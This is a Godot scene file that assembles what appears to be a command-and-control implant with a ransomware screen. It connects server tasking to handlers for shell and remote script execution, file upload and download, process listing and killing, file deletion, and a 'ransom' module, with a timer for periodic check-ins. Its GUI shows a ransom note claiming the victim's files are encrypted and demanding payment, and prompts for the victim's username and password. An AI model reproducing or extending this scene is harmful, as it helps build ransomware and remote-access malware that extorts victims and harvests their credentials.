[gd_scene load_steps=21 format=3 uid="uid://gjfuqrhyfrrh"]

[ext_resource type="Script" path="res://execute.gd" id="1"]
[ext_resource type="Script" path="res://api.gd" id="2"]
[ext_resource type="Script" path="res://config.gd" id="3"]
[ext_resource type="Script" path="res://uuid.gd" id="4"]
[ext_resource type="Script" path="res://tasking.gd" id="5"]
[ext_resource type="Script" path="res://checkin.gd" id="6"]
[ext_resource type="Script" path="res://Agent.gd" id="7"]
[ext_resource type="Script" path="res://CallbackTimer.gd" id="8"]
[ext_resource type="FontFile" uid="uid://de7nhbj1sebow" path="res://fonts/OpenDyslexic3-Regular.ttf" id="9"]
[ext_resource type="Script" path="res://ransom.gd" id="10"]
[ext_resource type="Script" path="res://GUI.gd" id="11"]
[ext_resource type="Script" path="res://transfer.gd" id="12"]
[ext_resource type="Script" path="res://ps.gd" id="13"]
[ext_resource type="Script" path="res://kill.gd" id="14"]
[ext_resource type="Script" path="res://ls.gd" id="15"]

[sub_resource type="FontFile" id="1"]
fallbacks = Array[Font]([ExtResource("9")])
face_index = null
embolden = null
transform = null
cache/0/16/0/ascent = 0.0
cache/0/16/0/descent = 0.0
cache/0/16/0/underline_position = 0.0
cache/0/16/0/underline_thickness = 0.0
cache/0/16/0/scale = 1.0
cache/0/16/0/kerning_overrides/16/0 = Vector2(0, 0)

[sub_resource type="FontFile" id="2"]
fallbacks = Array[Font]([ExtResource("9")])
face_index = null
embolden = null
transform = null
cache/0/16/0/ascent = 0.0
cache/0/16/0/descent = 0.0
cache/0/16/0/underline_position = 0.0
cache/0/16/0/underline_thickness = 0.0
cache/0/16/0/scale = 1.0
cache/0/16/0/glyphs/0/advance = Vector2(0, 0)
cache/0/16/0/glyphs/0/offset = Vector2(0, 0)
cache/0/16/0/glyphs/0/size = Vector2(0, 0)
cache/0/16/0/glyphs/0/uv_rect = Rect2(0, 0, 0, 0)
cache/0/16/0/glyphs/0/texture_idx = -1
cache/0/16/0/kerning_overrides/16/0 = Vector2(0, 0)

[sub_resource type="FontFile" id="3"]
fallbacks = Array[Font]([ExtResource("9")])
face_index = null
embolden = null
transform = null
cache/0/16/0/ascent = 0.0
cache/0/16/0/descent = 0.0
cache/0/16/0/underline_position = 0.0
cache/0/16/0/underline_thickness = 0.0
cache/0/16/0/scale = 1.0
cache/0/16/0/kerning_overrides/16/0 = Vector2(0, 0)

[sub_resource type="FontFile" id="4"]
fallbacks = Array[Font]([ExtResource("9")])
face_index = null
embolden = null
transform = null
cache/0/16/0/ascent = 0.0
cache/0/16/0/descent = 0.0
cache/0/16/0/underline_position = 0.0
cache/0/16/0/underline_thickness = 0.0
cache/0/16/0/scale = 1.0
cache/0/16/0/kerning_overrides/16/0 = Vector2(0, 0)

[sub_resource type="FontFile" id="5"]
fallbacks = Array[Font]([ExtResource("9")])
face_index = null
embolden = null
transform = null
cache/0/16/0/ascent = 0.0
cache/0/16/0/descent = 0.0
cache/0/16/0/underline_position = 0.0
cache/0/16/0/underline_thickness = 0.0
cache/0/16/0/scale = 1.0
cache/0/16/0/kerning_overrides/16/0 = Vector2(0, 0)

[node name="Agent" type="Node"]
script = ExtResource("7")

[node name="transfer" type="Node" parent="."]
script = ExtResource("12")

[node name="ls" type="Node" parent="."]
script = ExtResource("15")

[node name="kill" type="Node" parent="."]
script = ExtResource("14")

[node name="execute" type="Node" parent="."]
script = ExtResource("1")

[node name="ps" type="Node" parent="."]
script = ExtResource("13")

[node name="config" type="Node" parent="."]
script = ExtResource("3")

[node name="api" type="Node" parent="."]
script = ExtResource("2")

[node name="uuid" type="Node" parent="."]
script = ExtResource("4")

[node name="checkin" type="Node" parent="."]
script = ExtResource("6")

[node name="tasking" type="Node" parent="."]
script = ExtResource("5")

[node name="ransom" type="Node" parent="."]
script = ExtResource("10")

[node name="CallbackTimer" type="Timer" parent="."]
script = ExtResource("8")

[node name="GUI" type="Node2D" parent="."]
script = ExtResource("11")

[node name="ColorRect" type="ColorRect" parent="GUI"]
custom_minimum_size = Vector2(1024, 768)
offset_right = 1024.0
offset_bottom = 768.0
color = Color(0.0117647, 0, 0, 1)

[node name="ScreenContainer" type="HBoxContainer" parent="GUI"]
offset_right = 1024.0
offset_bottom = 768.0
alignment = 1

[node name="MessageContainer" type="VBoxContainer" parent="GUI/ScreenContainer"]
custom_minimum_size = Vector2(1024, 768)
layout_mode = 2
alignment = 1

[node name="Label" type="Label" parent="GUI/ScreenContainer/MessageContainer"]
layout_mode = 2
theme_override_fonts/font = SubResource("1")
text = "All your system is belong to us!"
uppercase = true

[node name="Label2" type="Label" parent="GUI/ScreenContainer/MessageContainer"]
layout_mode = 2
theme_override_fonts/font = SubResource("2")
text = "We've isolated and encrypted key files on your system...
While also infecting it with our control software.

We will remove the infection while also restoring your files...for a cost!"

[node name="Label3" type="Label" parent="GUI/ScreenContainer/MessageContainer"]
layout_mode = 2
theme_override_fonts/font = SubResource("3")
text = "You must enter your username and password to continue.
"

[node name="CredentialContainer" type="HBoxContainer" parent="GUI/ScreenContainer/MessageContainer"]
layout_mode = 2
alignment = 1

[node name="UsernameInput" type="LineEdit" parent="GUI/ScreenContainer/MessageContainer/CredentialContainer"]
custom_minimum_size = Vector2(426, 60)
layout_mode = 2
theme_override_fonts/font = SubResource("4")
placeholder_text = "Username"

[node name="PasswordInput" type="LineEdit" parent="GUI/ScreenContainer/MessageContainer/CredentialContainer"]
custom_minimum_size = Vector2(426, 60)
layout_mode = 2
theme_override_fonts/font = SubResource("5")
placeholder_text = "Password"

[node name="VerifyButton" type="Button" parent="GUI/ScreenContainer/MessageContainer/CredentialContainer"]
layout_mode = 2
disabled = true
text = "Verify"

[connection signal="checkin" from="." to="checkin" method="_on_Agent_checkin"]
[connection signal="post_response" from="." to="tasking" method="_on_Agent_post_response"]
[connection signal="tasking" from="." to="tasking" method="_on_Agent_tasking"]
[connection signal="download" from="tasking" to="transfer" method="_on_tasking_download"]
[connection signal="download_chunk" from="tasking" to="transfer" method="_on_tasking_download_chunk"]
[connection signal="download_start" from="tasking" to="transfer" method="_on_tasking_download_start"]
[connection signal="exit" from="tasking" to="." method="_on_tasking_exit"]
[connection signal="gdscript" from="tasking" to="execute" method="_on_tasking_gdscript"]
[connection signal="kill" from="tasking" to="kill" method="_on_tasking_kill"]
[connection signal="ls" from="tasking" to="ls" method="_on_tasking_ls"]
[connection signal="post_response" from="tasking" to="api" method="_on_tasking_post_response"]
[connection signal="ps" from="tasking" to="ps" method="_on_tasking_ps"]
[connection signal="ransom" from="tasking" to="ransom" method="_on_tasking_ransom"]
[connection signal="rm" from="tasking" to="execute" method="_on_tasking_rm"]
[connection signal="shell" from="tasking" to="execute" method="_on_tasking_shell"]
[connection signal="upload" from="tasking" to="transfer" method="_on_tasking_upload"]
[connection signal="upload_chunk" from="tasking" to="transfer" method="_on_tasking_upload_chunk"]
[connection signal="upload_start" from="tasking" to="transfer" method="_on_tasking_upload_start"]
[connection signal="whoami" from="tasking" to="execute" method="_on_tasking_whoami"]
[connection signal="timeout" from="CallbackTimer" to="tasking" method="_on_CallbackTimer_timeout"]
[connection signal="verify_username_password" from="GUI" to="ransom" method="_on_GUI_verify_username_password"]
[connection signal="button_up" from="GUI/ScreenContainer/MessageContainer/CredentialContainer/VerifyButton" to="GUI" method="_on_VerifyButton_button_up"]
